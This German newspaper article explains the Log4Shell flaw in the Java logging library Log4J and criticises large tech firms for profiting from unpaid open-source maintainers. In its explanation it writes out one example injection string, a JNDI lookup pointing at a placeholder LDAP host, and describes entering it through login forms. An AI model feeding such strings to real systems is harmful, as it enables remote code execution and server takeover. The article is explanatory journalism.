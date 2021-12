Jpl-Caltech/NASA/ZUMA Wire/dpa Demnächst fremdgesteuert? Auch der auf dem Mars eingesetzte NASA-Minihubschrauber »Ingenuity« nutzt Log4Shell

Softwareprobleme schaffen es nur selten in die Schlagzeilen. Beim jüngsten Fall »­Log4Shell« ist das anders, handelt es sich doch um einen Fehler, der dafür sorgt, dass mit einem ziemlich einfachen Angriff auf die Systeme der größten Webanwendungen beliebige Befehle ausgeführt werden können. Wie funktioniert das? Wie alle Texte kann man auch Programme in verschiedenen Sprachen verfassen. Eine dieser Sprachen ist Java. Damit ein Javaprogramm Logdateien produziert, wird dafür meist die Komponente »Log4J« verwendet. Diese sorgt nun für den Fehler, wenn es einen Eintrag mit einem Text wie »${jndi:ldap://beispiel.de}« protokollieren soll. Das kann man z. B. über ein Loginformular provozieren, denn fehlgeschlagene Anmeldeversuche werden häufig aufgezeichnet. Bei Apple hat es sogar gereicht, die Gerätebezeichnung in den I-Phone-Einstellungen entsprechend zu ändern. Das Javaprogramm führt dann alle Befehle aus, die es von der angegebenen Internetadresse herunterladen kann, installiert z. B. Fernsteuerungen oder kopiert die Datenbank. Im schlimmsten Fall kann die komplette Kontrolle über einen Server übernommen werden.

Wen betrifft das? Ziemlich viele Programme: vom Computerspiel Minecraft, wo die Sicherheitslücke überhaupt erst aufgefallen war, über Apples I-Cloud und Teslas vernetzte Autos bis hin zu Google und Twitter. Ein Großteil der langen Liste der kaputten Systeme ist jedoch den meisten unbekannt, was nicht bedeutet, dass sie deshalb weniger wichtig wären, denn nicht nur die großen Plattformen kommen ohne Algorithmen von »Elastic Search« oder die Datenank »Redis« kaum aus.

Betrifft das auch mich? Ja, aber nur vermittelt. Moderne Softwareproduktion ist hochintegriertes Stückwerk, das digitale Äquivalent zur Just-in-time-Produktion. Apps und Webanwendungen sind komplexe Systeme, bestehend aus einer Unmenge kleiner Softwarekomponenten zur Datenspeicherung, zum sicheren Anmelden, für die Bildbearbeitung usw. Softwareschnipsel von Tausenden Entwicklern fließen in Navigationssysteme oder Onlineshoppingseiten ein. Wenn wie jetzt einer dieser Bausteine kaputtgeht, werden weltweit die Scherben in Sonderschichten aufgefegt. Volkan ­Yazici schreibt auf Twitter: »Wir Log4J-Entwickler arbeiten ohne Schlaf an Gegenmaßnahmen, Reparaturen, Sicherheitswarnungen, beantworten Nachfragen etc.«

Tatsächlich beruhen sehr viele Programme auf Hobbyprojekten und unbezahlter Heimarbeit idealistischer Freizeitentwickler. Ein Beispiel: 2014 wurde der »Heartbleed-Bug« in der Verschlüsselungssoftware »Open SSL« bekannt, der so ziemlich alle Geräte oberhalb eines Taschenrechners betraf und überall Updates nötig machte. Die vier Kernentwickler von »Open SSL« arbeiten mit einem auf Spenden basierenden jährlichen Budget von lächerlichen 2.000 US-Dollar. Auch Ralph Goers, der Hauptbetreuer von »Log4J«, bastelt nach Feierabend an dem Programm.

Die Open-Source-Bewegung, die mit dem Versprechen von Informationsfreiheit und Demokratisierung angetreten ist, hat über die letzten Jahrzehnte die Grundlage für den heutigen Stand der Internetwirtschaft gelegt. Sie hat ihre Projekte meist ohne Gewinnabsicht und oft in Abgrenzung zum monopolisierten und zentralisierten Internet der »Big Five« Google (Alphabet), Amazon, Apple, Facebook (Meta Plattforms) und Microsoft aufgebaut. Neben den Gewinnen aus ihren selbstentwickelten Programmen verleiben sich diese Unternehmen so auch die unbezahlte Arbeit von Entwicklern wie des Projekts »Log4J« ein. Für einen Obolus von ein paar hunderttausend US-Dollar lassen sich die genannten Unternehmen auf der Website der »Apache Foundation«, die auch »Log4J« beheimatet, als »Platinum-Sponsoren« ehren. So funktioniert schon seit Jahren die längst nicht mehr so neue, schöne Welt des Internets in Zeiten des entwickelten Monopolkapitalismus.